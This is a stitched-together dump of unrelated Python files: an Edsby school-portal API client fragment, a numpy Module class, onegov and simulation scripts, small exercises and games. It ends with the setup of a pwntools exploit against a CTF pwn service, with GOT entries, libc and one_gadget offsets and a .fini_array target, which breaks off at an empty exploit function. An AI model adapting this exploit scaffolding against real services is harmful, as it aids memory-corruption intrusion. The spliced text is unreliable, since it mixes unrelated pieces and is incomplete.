'social-shmart-file-integrations-integrationfiledata': message['filedata'],
'social-shmart-file-integrations-integrationfiles': message['files']
}
return requests.post('https://'+self.edsbyHost+'/core/create/'+str(classNID)+'?xds=CourseFeedMsg&xdsr=CourseFeed&rxdstype=ref&merge=merge',data=messageSubmission,cookies=self.getCookies(),headers=self.getHeaders()).json()['slice']['slices'][0]['data']['item']
"""
Posts a message in the class feed. This takes a dict called message, which looks like this:
{
'text': '<the message text>',
'url': '<an optional URL, shows up as a hyperlink in Edsby>',
'pin': 8,
'filedata': '',
'files': '',
}
"""
def editMessageInClassFeed(self, classNID, feedItemRID, feedItemNID, message):
messageSubmission = {
'_formkey': self.studentData['formkey'],
'social-pin': message['pin'], # 8
'social-shmart-body': message['text'],
'social-shmart-url': message['url'],
'social-shmart-file-integrations-integrationfiledata': message['filedata'],
'social-shmart-file-integrations-integrationfiles': message['files']
}
return requests.post('https://'+self.edsbyHost+'/core/node/'+str(classNID)+'/'+str(feedItemRID)+'/'+str(feedItemNID)+'?xds=feedItemEdit&_i=2',data=messageSubmission,cookies=self.getCookies(),headers=self.getHeaders()).json()
"""
Posts a reply to a message in the class feed. This takes a dict called message, which looks like this:
{
'text': '<the message text>',
'url': '<an optional URL, shows up as a hyperlink in Edsby>',
'pin': 8,
'nodetype': 4,
'node_subtype': 23,
'filedata': '',
'files': '',
'parent_nid': <parent feed item NID>,
'parent_rid': <parent feed item RID>
}
"""
def postReplyInClassFeed(self, classNID, message):
messageSubmission = {
'_formkey': self.studentData['formkey'],
'body-pin': message['pin'], # 8
'body-shmart-nodetype': message['nodetype'], # 4
'body-shmart-nodesubtype': message['node_subtype'], # 23
'body-shmart-body': message['text'],
'body-shmart-url': message['url'],
'body-shmart-file-integrations-integrationfiledata': message['filedata'],
'body-shmart-file-integrations-integrationfiles': message['files'],
'replyTo': '',
'thread': message['parent_nid']
}
return requests.post('https://'+self.edsbyHost+'/core/create/'+str(classNID)+'/'+str(message['parent_rid'])+'/'+str(classNID)+'?xds=feedreply&xdsr=CourseFeed&__delegated=CourseFeed',data=messageSubmission,cookies=self.getCookies(),headers=self.getHeaders()).json()['slice']['slices'][0]['data']['item']
"""
Posts a message with an accompanying file in the class feed. This takes a dict called message,
which looks like this:
{
'text': '<the message text>',
'url': '<an optional URL, shows up as a hyperlink in Edsby>',
'pin': 8,
'nodetype': 4,
'node_subtype': 0,
'filedata': '',
'files': '',
}
TODO - Edsby complains of an invalid key when attempting to upload. Suspect form data formatting in POST.
"""
def postFileInClassFeed(self, classNID, message, fileName, filePath):
messageSubmission = {
'_formkey': self.studentData['formkey'],
'social-pin': message['pin'], # 10
'social-shmart-nodetype': message['nodetype'], # 4
'social-shmart-nodesubtype': message['node_subtype'], # 0
'social-shmart-body': message['text'],
'social-shmart-url': message['url'],
'social-shmart-file-integrations-integrationfiledata': message['filedata'],
'social-shmart-file-integrations-integrationfiles': message['files']
}
postMetadata = requests.post('https://'+self.edsbyHost+'/core/create/'+str(classNID)+'?xds=CourseFeedMsg&xdsr=CourseFeed&rxdstype=ref&merge=merge',data=messageSubmission,cookies=self.getCookies(),headers=self.getHeaders()).json()['slice']['slices'][0]['data']['item']
parentRID = next(iter(postMetadata))
cookies = self.session.cookies.get_dict()
uploadData = {
'name': fileName,
'nodetype': '5.0',
'pin': '2',
'_formkey': self.studentData['formkey'],
}
for key in cookies:
uploadData[key] = cookies[key]
uploadData['files'] = (fileName, open(filePath, 'rb'))
return requests.post('https://'+self.edsbyHost+'/core/create/'+str(classNID)+'/'+str(postMetadata[parentRID]['rid'])+'/'+str(postMetadata[parentRID]['nid'])+'?xds=MultiFileUploader',files=uploadData,cookies=self.getCookies(),headers=self.getHeaders()).json()
"""
Likes an item in the feed for a class
Call getClassFeed before this function to prevent errors
"""
def likeItemInFeed(self, classNID, feedItemNID, feedItemRID):
likeData = {
'likes': 1,
'_formkey': self.studentData['formkey'],
}
return requests.post('https://'+self.edsbyHost+'/core/node/'+str(classNID)+'/'+str(feedItemRID)+'/'+str(feedItemNID)+'?xds=doLike',data=likeData,cookies=self.getCookies(),headers=self.getHeaders()).json()
"""
Unlikes an item in the feed for a class
Call getClassFeed before this function to prevent errors
"""
def unlikeItemInFeed(self, classNID, feedItemNID, feedItemRID):
likeData = {
'likes': None,
'_formkey': self.studentData['formkey']
}
return requests.post('https://'+self.edsbyHost+'/core/node/'+str(classNID)+'/'+str(feedItemRID)+'/'+str(feedItemNID)+'?xds=doLike',data=likeData,cookies=self.getCookies(),headers=self.getHeaders()).json()
"""
Retrieves metadata about files attached to feed items, should they be present
If Edsby complains, call getClassFeed before using this function
"""
def getAttachmentMetadata(self, feedItemNID, attachmentNID):
return requests.get('https://'+self.edsbyHost+'/core/node.json/'+str(feedItemNID)+'/'+str(attachmentNID)+'?xds=AlbumFileView',cookies=self.getCookies(),headers=self.getHeaders()).json()['slices'][0]['data']['contents']
"""
Generates the URL to download a particular file from Edsby, as such URLs are long and verbose.
Helper function to downloadAttachment. Useful if you want to handle file downloading in another
application (If you do, make sure you also take the session cookies with you).
"""
def getAttachmentDownloadURL(self, classNID, feedItemNID, feedItemRID, attachmentNID):
return 'https://'+self.edsbyHost+'/core/nodedl/classNID/'+str(feedItemRID)+'/'+str(feedItemNID)+'/'+str(feedItemRID)+'/'+str(attachmentNID)+'?field=file&attach=1&xds=fileThumbnail'
"""
Downloads an attachment from Edsby to the specified local path.
You could, for example, check a courses' feed at a regular interval, and then download
any new files attached to new posts.
"""
def downloadAttachment(self, classNID, feedItemNID, feedItemRID, attachmentNID, filePath):
self.getClassFeed(classNID) # Must call these before attempting to download, otherwise API denies access
self.getAttachmentMetadata(feedItemNID, feedItemRID) # Another prerequisite call
attachment = requests.get(self.getAttachmentDownloadURL(classNID, feedItemNID, feedItemRID, attachmentNID),cookies=self.getCookies(),headers=self.getHeaders(),stream=True)
with open(filePath, 'wb') as localFile:
for attachmentPart in attachment.iter_content(chunk_size=1024):
if attachmentPart:
localFile.write(attachmentPart)
return filePath
"""
Retrieves the 'Edsby River' of school news available to the current user.
"""
def getScrollingNews(self):
news = requests.get('https://'+self.edsbyHost+'/core/node.json/'+str(self.studentData['nid'])+'?xds=scrollingNews',cookies=self.getCookies(),headers=self.getHeaders()).json()
return news if 'item' in news['slices'][0]['data']['boxLayout']['newsbox'] else ''
"""
Retrieves the 'Recent Activity' section of the main Edsby page.
"""
def getBaseActivity(self, spage=0):
nids = [self.studentData['nid']]
nids.extend(self.getCurrentClassNIDList())
nids = '.'.join(str(e) for e in nids)
activity = requests.get('https://'+self.edsbyHost+'/core/multinode.json/'+nids+'?xds=BaseActivity&spage='+str(spage),cookies=self.getCookies(),headers=self.getHeaders()).json()['slices'][0]['data']['messages']
return activity if 'item' in activity else ''
"""
Returns a dict of dicts containing groups the user is a part of in this format:
'r<group RID>': {
'summary': {
'about': {
'type': 1,
'name': "<group name>"
},
'name': "<group name>",
'info': {
'nposts': <number of posts>',
'nmembers': <number of members>
}
},
'nid': <group NID>,
'rid': <group RID>,
'nodetype': 3,
'pic': {
'profpic': '<group NID>'
},
'nodesubtype': 1
}
"""
def getStudentGroups(self):
return requests.get('https://'+self.edsbyHost+'/core/node.json/'+str(self.studentData['nid'])+'?xds=MyGroups&combine=true',cookies=self.getCookies(),headers=self.getHeaders()).json()['slices'][0]['data']['places']['item']
"""
Helper to generate download URL for a given user's profile pic. Edsby itself returns a default profile pic if one does not exist.
"""
def getProfilePicDownloadURL(self, userNID, size=0):
if size > 0:
return 'https://'+self.edsbyHost+'/core/nodedl/'+str(userNID)+'?nodepic=true&field=file&xds=fileThumbnail&size='+str(size)+','+str(size)
else:
return 'https://' + self.edsbyHost + '/core/nodedl/' + str(userNID) + '?nodepic=true&field=file&xds=fileThumbnail'
"""
Returns schedule for user for current date, or for targetDate if one is provided.
targetDate must be formatted as YYYYMMDD.
"""
def getSchedule(self,targetDate=0):
if targetDate == 0:
schedule = requests.get('https://' + self.edsbyHost + '/core/node.json/' + str(self.studentData['unid']) + '?xds=CalendarPanelNav_Student',cookies=self.getCookies(), headers=self.getHeaders()).json()['slices'][0]['data']
if 'itemdata' in schedule:
return schedule['itemdata']
else:
return None
else:
schedule = requests.get('https://' + self.edsbyHost + '/core/node.json/' + str(self.studentData['unid']) + '?xds=CalendarPanelNav_Student&targetDate='+str(targetDate), cookies=self.getCookies(),headers=self.getHeaders()).json()['slices'][0]['data']
if 'itemdata' in schedule:
return schedule['itemdata']
else:
return None
"""
Returns the feed of all messages posted in the feed of a given group NID.
"""
def getGroupFeed(self, groupNID, spage=0):
feed = requests.get('https://'+self.edsbyHost+'/core/node.json/'+str(groupNID)+'?xds=PlaceFeed&spage='+str(spage),cookies=self.getCookies(),headers=self.getHeaders()).json()['slices'][0]['data']
return feed if 'item' in feed else ''
"""
Returns calendar entries for a specified group.
"""
def getGroupCalendar(self, groupNID):
return requests.get('https://'+self.edsbyHost+'/core/node.json/'+str(groupNID)+'?xds=CalendarPanel_Place',cookies=self.getCookies(),headers=self.getHeaders()).json()['slices'][0]['data']
"""
Returns recent group members with last active date and time.
"""
def getGroupActiveList(self, groupNID):
return requests.get('https://'+self.edsbyHost+'/core/node.json/'+str(groupNID)+'?xds=GroupActiveList',cookies=self.getCookies(),headers=self.getHeaders()).json()['slices'][0]['data']['places']['item']
"""
Returns all group members.
"""
def getFullGroupRoster(self, groupNID):
return requests.get('https://'+self.edsbyHost+'/core/node.json/'+str(groupNID)+'?xds=ConferenceMemberList',cookies=self.getCookies(),headers=self.getHeaders()).json()['slices'][0]['data']['places']['item']
"""
Returns poll data for a specified poll. The same info is returned in getClassFeed or getGroupFeed.
Call getGroupFeed or getClassFeed (as applicable) before this to prevent errors.
"""
def getPollData(self, groupNID, pollNID, pollRID):
return requests.get('https://'+self.edsbyHost+'/core/node.json/'+str(groupNID)+'/'+str(pollRID)+'/'+str(pollNID)+'?xds=FIBPoll',cookies=self.getCookies(),headers=self.getHeaders()).json()
"""
Returns all voters for a specified poll.
Call getGroupFeed or getClassFeed (as applicable) before this to prevent errors.
"""
def getPollVoters(self, groupNID, pollNID, pollRID):
return requests.get('https://'+self.edsbyHost+'/core/node.json/'+str(groupNID)+'/'+str(pollRID)+'/'+str(pollNID)+'?xds=PollGetVoters',cookies=self.getCookies(),headers=self.getHeaders()).json()['slices'][0]['data']
"""
Allows you to vote on items. Should work for classes to, though has only been tested with groups.
Call getGroupFeed or getClassFeed (as applicable) before this to prevent errors.
"""
def voteItemInFeed(self, groupNID, pollNID, pollRID, pollVote):
voteData = {
'vote': pollVote,
'_formkey': self.studentData['formkey'],
}
return requests.post('https://'+self.edsbyHost+'/core/node/'+str(groupNID)+'/'+str(pollRID)+'/'+str(pollNID)+'?xds=PollVote',data=voteData,cookies=self.getCookies(),headers=self.getHeaders()).json()
"""
Allows you to pin a message in a group.
Call getRawGroupData before this to prevent errors.
Untested in classes, theorize that it should work.
"""
def pinFeedItem(self, groupNID, feedItemRID):
pinData = {
'_formkey': self.studentData['formkey'],
'field': 1,
'rid': feedItemRID,
'value': 1,
}
return requests.post('https://'+self.edsbyHost+'/core/putlink/'+str(groupNID)+'?xds=pin',data=pinData,cookies=self.getCookies(),headers=self.getHeaders()).json()
"""
Allows you to pin a message in a group.
Call getRawGroupData before this to prevent errors.
Untested in classes, theorize that it should work.
"""
def unpinFeedItem(self, groupNID, feedItemRID):
pinData = {
'_formkey': self.studentData['formkey'],
'field': 1,
'rid': feedItemRID,
'value': 0,
}
return requests.post('https://'+self.edsbyHost+'/core/putlink/'+str(groupNID)+'?xds=pin',data=pinData,cookies=self.getCookies(),headers=self.getHeaders()).json()
"""
Posts a message in the group feed. This takes a dict called message, which looks like this:
{
'text': '<the message text>',
'url': '<an optional URL, shows up as a hyperlink in Edsby>',
'pin': 8,
'nodetype': 4,
'node_subtype': 0,
'filedata': '',
'files': '',
}
"""
def postMessageInGroupFeed(self, groupNID, message):
messageSubmission = {
'_formkey': self.studentData['formkey'],
'social-pin': message['pin'], # 8
'social-shmart-nodetype': message['nodetype'], # 4
'social-shmart-nodesubtype': message['node_subtype'], # 0
'social-shmart-body-body': message['text'],
'social-shmart-url': message['url'],
'social-tools-addresources-integrations-integrationfiledata': message['filedata'],
'social-tools-addresources-integrations-integrationfiles': message['files']
}
return requests.post('https://'+self.edsbyHost+'/core/create/'+str(groupNID)+'?xds=feedmsg&xdsr=PlaceFeed&rxdstype=ref&noDirtyForm=true',data=messageSubmission,cookies=self.getCookies(),headers=self.getHeaders()).json()['slice']['slices'][0]['data']['item']
"""
Posts a message with an accompanying file in the group feed. This takes a dict called message,
which looks like this:
{
'text': '<the message text>',
'url': '<an optional URL, shows up as a hyperlink in Edsby>',
'pin': 10,
'nodetype': 4,
'node_subtype': 0,
'filedata': '',
'files': '',
}
"""
def postFileInGroupFeed(self, groupNID, message, fileName, filePath):
uploadData = {
'_formkey': self.studentData['formkey'],
'name': fileName,
'nodetype': '5.9',
'pin': '2'
}
files=[('upload',(fileName,open(filePath,'rb'),'application/octet-stream'))]
response = requests.post('https://'+self.edsbyHost+'/core/create.json/tmp?xds=MultiFileUploaderNoThumbnailing&nodetype=5.9&temp=tmp',files=files, data=uploadData,cookies=self.getCookies(),headers=self.getHeaders()).json()
messageSubmission = {
'_formkey': self.studentData['formkey'],
'social-pin': message['pin'], # 10
'social-shmart-nodetype': message['nodetype'], # 4
'social-shmart-nodesubtype': message['node_subtype'], # 0
'social-shmart-body-body': message['text'],
'social-shmart-url': message['url'],
'social-tools-addresources-integrations-integrationfiledata': message['filedata'], # pin:2
'social-tools-addresources-integrations-integrationfiles': message['files'],
'social-tools-addresources-linkFiles': response['nid'],
'social-tools-addresources-linkRich': response['nid']
}
return requests.post('https://'+self.edsbyHost+'/core/create/'+str(groupNID)+'?xds=feedmsg&xdsr=PlaceFeed&rxdstype=ref&noDirtyForm=true',data=messageSubmission,cookies=self.getCookies(),headers=self.getHeaders()).json()['slice']['slices'][0]['data']['item']
"""
Deletes specified post in a group.
Works with top level posts and comments.
"""
def deletePostInGroupFeed(self, groupNID, postRID):
body = {
'_formkey': self.studentData['formkey'],
'field': 8,
'rid': postRID,
'value': 0
}
return requests.post('https://'+self.edsbyHost+'/core/putlink/'+str(groupNID)+'?xds=pin',data=body,cookies=self.getCookies(),headers=self.getHeaders()).json()
"""
Returns raw data from a specified group.
"""
def getRawGroupData(self, groupNID):
return requests.get('https://'+self.edsbyHost+'/core/node.json/'+str(groupNID)+'?xds=Place',cookies=self.getCookies(),headers=self.getHeaders()).json()['slices'][0]
"""
Returns all moderators of a specified group.
"""
def getGroupModerators(self, groupNID):
return self.getRawGroupData(groupNID)['data']['col1']['moderators']
"""
Posts a poll in the group feed. This takes a dict called message, which looks like this:
{
"question": "Which fruit do you prefer?",
"choices": ["apples", "oranges"],
"showResults": ""
}
Set "showResults" to "1" for results to be publicly visible.
It can also post files with the poll, pass the fileName and filePath variables to do so.
"""
def postPollInGroupFeed(self, groupNID, pollData, fileName="", filePath=""):
choices = dict()
body = {
"_formkey": self.studentData['formkey'],
"poll-enum": str(choices),
"poll-question": str(pollData["question"]),
"showResults": str(pollData["showResults"]),
"file-linkFiles": "",
"file-linkRich": "",
"nodesubtype": 48,
"nodetype": 6,
"pin": "8",
"file-integrations-integrationfiledata": "pin:2",
"file-integrations-integrationfiles": ""
}
if len(fileName) > 0 and len(filePath) > 0:
uploadData = {
'_formkey': self.studentData['formkey'],
'name': fileName,
'nodetype': '5.9',
'pin': '2'
}
files=[('upload',(fileName,open(filePath,'rb'),'application/octet-stream'))]
response = requests.post('https://'+self.edsbyHost+'/core/create.json/tmp?xds=MultiFileUploaderNoThumbnailing&nodetype=5.9&temp=tmp',files=files, data=uploadData,cookies=self.getCookies(),headers=self.getHeaders()).json()
body.update({
"file-linkFiles": response['nid'],
"file-linkRich": response['nid']
})
else:
body.update({
"file-linkFiles": "",
"file-linkRich": ""
})
for i in range(0, len(pollData["choices"])):
body[str(i)] = str(pollData["choices"][i])
choices[str(i + 1)] = str(pollData["choices"][i])
body["poll-enum"] = str(json.dumps(choices))
return requests.post('https://'+self.edsbyHost+'/core/create/'+str(groupNID)+'?xds=CreatePoll&xdsr=PlaceFeed&rxdstype=ref&validate=poll',data=body, cookies=self.getCookies(),headers=self.getHeaders()).json()
"""
Posts a reply to a message in the group feed. This takes a dict called message, which looks like this:
{
'text': '<the message text>',
'url': '<an optional URL, shows up as a hyperlink in Edsby>',
'pin': 8,
'nodetype': 4,
'node_subtype': 23,
'filedata': '',
'files': '',
'parent_nid': <parent feed item NID>,
'parent_rid': <parent feed item RID>
}
"""
def postReplyInGroupFeed(self, groupNID, message):
messageSubmission = {
'_formkey': self.studentData['formkey'],
'body-pin': message['pin'], # 8
'body-shmart-nodetype': message['nodetype'], # 4
'body-shmart-nodesubtype': message['node_subtype'], # 23
'body-shmart-body-body': message['text'],
'body-shmart-url': message['url'],
'body-tools-addresources-integrations-integrationfiledata': message['filedata'],
'body-tools-addresources-integrations-integrationfiles': message['files'],
'replyToNode': message['parent_nid'],
'thread': message['parent_nid']
}
return requests.post('https://'+self.edsbyHost+'/core/create/'+str(groupNID)+'/'+str(message['parent_rid'])+'/'+str(groupNID)+'?xds=feedreply&xdsr=CourseFeed&__delegated=CourseFeed',data=messageSubmission,cookies=self.getCookies(),headers=self.getHeaders()).json()
"""
Invites a user to a group. Accepts group NID and a list of user NIDs.
"""
def inviteUsersToGroup(self, groupNID, usersNID):
body = {
"_dest": groupNID,
"_formkey": self.studentData['formkey'],
"pending": '1',
"body-members": usersNID
}
return requests.post('https://'+self.edsbyHost+'/core/link/'+str(usersNID.replace(",", "."))+'?xds=PlacesInvite&_processed=true',data=body, cookies=self.getCookies(),headers=self.getHeaders()).json()
class Error(Exception):
    """Base class for all exceptions raised by this Edsby client."""
    pass


class LoginError(Error):
    """Raised when authentication against the Edsby portal fails.

    FIX: the base Exception initializer was never called, so str(err) and
    err.args were empty; the message is now propagated to Exception as well
    as kept on the .message attribute for backward compatibility.
    """
    def __init__(self, message):
        super(LoginError, self).__init__(message)
        self.message = message
|
from collections import OrderedDict
from typing import Dict
import numpy as np
class Parameter:
    """A trainable array paired with its accumulated gradient."""

    def __init__(self, value: np.ndarray) -> None:
        self.value: np.ndarray = value
        # gradient starts at zero with the same shape/dtype as the value
        self.grad: np.ndarray = np.zeros_like(value)


class Module:
    """Minimal base class for neural-network building blocks.

    Subclasses override forward/backward/predict and register their
    Parameters so that parameters() and zero_grad() can reach them
    generically. is_train toggles training vs. evaluation mode.

    Cleanups: abstract methods now raise NotImplementedError (a subclass of
    Exception, so existing handlers still work), the stray `pass` in
    __init__ was removed, and membership tests use the dict directly
    instead of `.keys()`.
    """

    def __init__(self):
        # name -> Parameter, insertion-ordered; name-mangled to _Module__parameters
        self.__parameters: Dict[str, Parameter] = OrderedDict()
        self.is_train: bool = False

    def forward(self, *x_input: np.ndarray):
        """Compute the module's output; must be overridden."""
        raise NotImplementedError("forward is not implemented")

    def backward(self, *d_output: np.ndarray):
        """Propagate gradients given upstream gradients; must be overridden."""
        raise NotImplementedError("backward is not implemented")

    def register_parameter(self, param_name: str, parameter: Parameter) -> None:
        """Register a Parameter under a unique name.

        Raises Exception if Module.__init__ was never called (no mangled
        parameter dict yet) or if the name is already taken.
        """
        if '_Module__parameters' not in self.__dict__:
            raise Exception("Module was not initialized")
        if param_name in self.__parameters:
            raise Exception("Parameter already exists")
        self.__parameters[param_name] = parameter

    def register_module_parameters(self, module_name: str, module) -> None:
        """Adopt all parameters of a child module, prefixed with its name."""
        assert isinstance(module, Module)
        for name, parameter in module.parameters().items():
            self.register_parameter(module_name + '_' + name, parameter)

    def zero_grad(self):
        """Reset every registered parameter's gradient to zeros."""
        for param in self.__parameters.values():
            param.grad = np.zeros_like(param.value)

    def parameters(self) -> Dict[str, Parameter]:
        """Return the (mutable) name -> Parameter mapping."""
        return self.__parameters

    def predict(self, *x_input: np.ndarray):
        """Inference entry point; must be overridden."""
        raise NotImplementedError("predict is not implemented")

    def train(self) -> None:
        """Switch the module into training mode."""
        self.is_train = True

    def eval(self) -> None:
        """Switch the module into evaluation mode."""
        self.is_train = False
|
'''
service module
'''
from .server import PrpcServer
from .client import PrpcClient
from .type_decorator import argument_check |
from onegov.activity import ActivityCollection
from onegov.feriennet.policy import ActivityQueryPolicy
from sqlalchemy.orm import joinedload
class VacationActivityCollection(ActivityCollection):
    """An ActivityCollection fixed to type 'vacation', with visibility
    restricted by an identity-specific ActivityQueryPolicy."""

    # type is ignored, but present to keep the same signature as the superclass
    def __init__(self, session, type=None, pages=(0, 0), filter=None,
                 identity=None):
        super().__init__(
            session=session,
            type='vacation',
            pages=pages,
            filter=filter
        )
        self.identity = identity

    @property
    def policy(self):
        """The query policy derived from the current identity (may be None/anonymous)."""
        return ActivityQueryPolicy.for_identity(self.identity)

    def transform_batch_query(self, query):
        # eagerly load occasions alongside each activity in a batch
        return query.options(joinedload('occasions'))

    def query_base(self):
        # restrict the base query to what the policy grants this identity
        return self.policy.granted_subset(self.session.query(self.model_class))

    def by_page_range(self, page_range):
        """Return a new collection over page_range, keeping session, identity and filter."""
        return self.__class__(
            session=self.session,
            identity=self.identity,
            pages=page_range,
            filter=self.filter
        )
|
"""
Efectuar la división de dos números enteros, utilizando
el método de las restas sucesivas. Observe el siguiente ejemplo:
Dividir 8 entre 2
8 – 2 = 6
6 – 2 = 4 número de restas efectuadas es igual al cociente =4
4 – 2 = 2
2 – 2 = 0 %resto de la división
Imprima el restante efectuado Ejemplos de prueba
"""
def restas_sucesivas(dividendo, divisor):
    """Return the integer quotient dividendo // divisor computed by
    successive subtraction (counts how many times divisor fits).

    Raises ValueError for divisor <= 0 — the original loop never
    terminated in that case.
    """
    if divisor <= 0:
        raise ValueError("divisor must be a positive integer")
    cociente = 0
    while dividendo >= divisor:
        dividendo -= divisor
        cociente += 1
    return cociente


if __name__ == "__main__":
    # Same interactive behavior as the original flat script
    dividendo = int(input("Ingresar Dividendo: "))
    divisor = int(input("Ingresar Divisor: "))
    print("La Division es igual a: " + str(restas_sucesivas(dividendo, divisor)))
import datetime
def print_line(args):
    """Print a timestamped separator line when args.verbose == 1."""
    if args.verbose == 1:
        stamp = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S ")
        print(stamp + "-" * 72)
def print_message(msg, args):
    """Print msg prefixed with a timestamp when args.verbose == 1."""
    if args.verbose == 1:
        stamp = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        print(stamp + ' - ' + str(msg))
def print_new_process(msg, args):
    """Print a separator line followed by a timestamped msg when args.verbose == 1."""
    if args.verbose == 1:
        print_line(args)
        stamp = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        print(stamp + ' - ' + str(msg))
def print_end(msg, args):
    """Close a processing phase: separator, message, separator.

    Silent unless args.verbose == 1.
    """
    if args.verbose == 1:
        print_line(args)
        stamp = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        print(stamp + ' - ' + str(msg))
        print_line(args)
|
#!/usr/bin/env python3
def strip_between_h(text):
    """Return text with everything from the first 'h' through the last 'h'
    (inclusive) removed.

    The original script appended the first and last fragments of
    text.split("h") unconditionally, so input containing no 'h' was
    duplicated ("abc" -> "abcabc"); that case now returns the input
    unchanged.
    """
    if "h" not in text:
        return text
    parts = text.split("h")
    return parts[0] + parts[-1]


if __name__ == "__main__":
    # Interactive I/O lives under the guard so the helper stays importable.
    print(strip_between_h(input("Enter string: ")))
|
import matplotlib.pyplot as plt
import itertools
def floating_point_system(beta, t, L, U):
    """Build a normalized floating point system F(beta, t, L, U).

    Input: beta (base), t (precision in digits), L and U (exponent range).
    Output: (numbers, N, UFL, OFL) where numbers lists every representable
    value (positive, negative and zero), N is the theoretical count,
    UFL is the smallest positive normalized number and OFL the largest.

    The original implementation enumerated only binary mantissas (leading
    digit fixed to 1, remaining digits from {0, 1}), so it was correct for
    beta = 2 only even though N, UFL and OFL were computed for general beta.
    The mantissa digits are now drawn from 0..beta-1 with a leading digit
    in 1..beta-1, matching N for any base; for beta = 2 the enumeration
    (values and order) is identical to the original.
    """
    # Theoretical count of values in the system, including zero.
    N = 2 * (beta - 1) * beta**(t - 1) * (U - L + 1) + 1
    # Smallest positive normalized number (underflow level).
    UFL = beta**(L)
    # Largest representable number (overflow level).
    OFL = beta**(U + 1) * (1 - beta**(-t))
    # All combinations of the t-1 fractional digits in base beta.
    table = list(itertools.product(range(beta), repeat=t - 1))
    numbers = []
    for e in range(L, U + 1):
        # The leading digit of a normalized mantissa is never zero.
        for lead in range(1, beta):
            for digits in table:
                xi = float(lead)
                for j, d in enumerate(digits):
                    if d:
                        xi += float(d) / beta**(j + 1)
                num = xi * beta**(e)
                # Add the value with both signs (+-).
                numbers.append(num)
                numbers.append(-num)
    numbers.append(0.0)
    return numbers, N, UFL, OFL
def graficar(x, N):
    """Plot the N values of the system x as red dots on the real line."""
    zeros = [0] * N
    plt.axhline(0, color='black')
    plt.ylim(-3, 3)
    plt.plot(x, zeros, 'ro')
    plt.grid()
    plt.show()
|
##########################
# R imports: Import R
# objects using rpy2
##########################
from rpy2.robjects.packages import importr
import rpy2.robjects as robjects
R = robjects.r
import rpy2.robjects.numpy2ri
rpy2.robjects.numpy2ri.activate()
GRF=importr('grf')
##########################
# Python imports
##########################
import argparse
from joblib import dump
import numpy as np
import pandas as pd
from sklearn.metrics import mean_squared_error
from data_generators.GRF_simulations import *
from py_utils.rpy2_conversions import *
##########################
# Params for all runs
##########################
n_test = 5000
##########################
# Get sample and split
##########################
def main(p, n, n_test, omega, kappa, additive, nuisance, seed):
    """Draw one GRF simulation sample, split it into train/test halves and
    dump both the arrays and the run parameters for the DeepIV step."""
    #############################
    # Make data
    #############################
    # Draw n + n_test observations in one call, then split by index.
    X, Y, W, Z, tau = get_sample(
        p, n + n_test, omega, kappa, additive, nuisance, seed
    )
    train, test = slice(None, n), slice(n, None)
    all_data = {
        'X_train': X[train],
        'Y_train': Y[train][:, np.newaxis],
        'W_train': W[train][:, np.newaxis],
        'Z_train': Z[train][:, np.newaxis],
        'tau_train': tau[train][:, np.newaxis],
        'X_test': X[test],
        'Y_test': Y[test][:, np.newaxis],
        'W_test': W[test][:, np.newaxis],
        'Z_test': Z[test][:, np.newaxis],
        'tau_test': tau[test][:, np.newaxis],
    }
    dump(all_data, 'output/temp/data_for_DeepIV.pkl')
    #############################
    # Write params
    #############################
    # Persist the configuration alongside the data for reproducibility.
    params = {
        'p': p,
        'n': n,
        'omega': omega,
        'kappa': kappa,
        'additive': additive,
        'nuisance': nuisance,
        'n_test': n_test,
        'seed': seed,
    }
    dump(params, 'output/temp/params.pkl')
if __name__=='__main__':
    # CLI entry point: one flag per simulation knob.
    parser = argparse.ArgumentParser(description='One run of GRF simulation')
    parser.add_argument('-p','--p', help='Ambient dimension', type=int)
    parser.add_argument('-n','--n-samples', help='Number of training samples', type=int)
    parser.add_argument('-kappa','--kappa', help='Number of informative features', type=int)
    parser.add_argument('-omega','--omega', help='Presence (1)/absence (0) of confounding', type=int)
    parser.add_argument('-additive','--additive', help='Aditivity of signal', choices=('True','False'))
    parser.add_argument('-nuisance','--nuisance', help='Presence of nuisance main effect terms', choices=('True','False'))
    parser.add_argument('-s','--seed', help='Random seed', type=int)
    args = parser.parse_args()
    # argparse delivers the choices as strings; convert to real booleans.
    args.additive = args.additive == 'True'
    args.nuisance = args.nuisance == 'True'
    # n_test comes from the module-level constant defined above.
    main(args.p, args.n_samples, n_test, args.omega, args.kappa,
         args.additive, args.nuisance, args.seed)
import random
def compare(left, right):
    """Return the comparison message printed for the pair (left, right)."""
    if left > right:
        return f'{left} Bigger {right}'
    elif left < right:
        return f'{left} Less {right}'
    else:
        return f'{left} Equal {right}'


def play_round(computer_first):
    """Play one round: draw the computer's number, read the player's,
    print both numbers and the comparison message.

    computer_first preserves the original output orientation: the first
    round phrased the result from the computer's side, the later rounds
    from the player's side.
    """
    n1 = random.randint(1, 10)
    answer = int(input('Enter some integer: '))
    print(f'You choose {answer}, computer {n1}')
    if computer_first:
        print(compare(n1, answer))
    else:
        print(compare(answer, n1))


if __name__ == "__main__":
    # The original script repeated the same round three times inline and ran
    # on import; the rounds are now deduplicated and guarded.
    # (Original note: the game is flawed — the player can always enter the
    # largest possible number.)
    play_round(True)
    play_round(False)
    play_round(False)
from pwn import *
import sys
#import kmpwn
sys.path.append('/home/vagrant/kmpwn')
from kmpwn import *
#fsb(width, offset, data, padding, roop)
#config
# pwntools context. NOTE(review): arch is declared 'i386', but the exploit
# below uses p64/u64 and a 64-bit libc path — this looks like an amd64
# target; confirm.
context(os='linux', arch='i386')
context.log_level = 'debug'
FILE_NAME = "./pwnable"
HOST = "binary.utctf.live"
PORT = 9003
"""
HOST = "localhost"
PORT = 7777
"""
# Pass 'r' on the command line to attack the remote service; the default is
# a local process with the system libc.
if len(sys.argv) > 1 and sys.argv[1] == 'r':
    conn = remote(HOST, PORT)
    libc = ELF('./libc-2.23.so')
else:
    conn = process(FILE_NAME)
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
elf = ELF(FILE_NAME)
# GOT entries used for the libc leak.
got_puts = elf.got["puts"]
got_printf = elf.got["printf"]
got_strcmp = elf.got["strcmp"]
# libc-relative offsets, used to compute the base after the leak.
off_puts = libc.symbols["puts"]
off_system = libc.symbols["system"]
#
#main_addr = elf.symbols["main"]
#libc_binsh = next(elf.search("/bin/sh"))
#addr_bss = elf.bss()
#addr_dynsym = elf.get_section_by_name('.dynsym').header['sh_addr']
# one_gadget candidate offsets for this libc build, and .fini_array address.
gadget = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
fini_array = 0x600e18
def exploit():
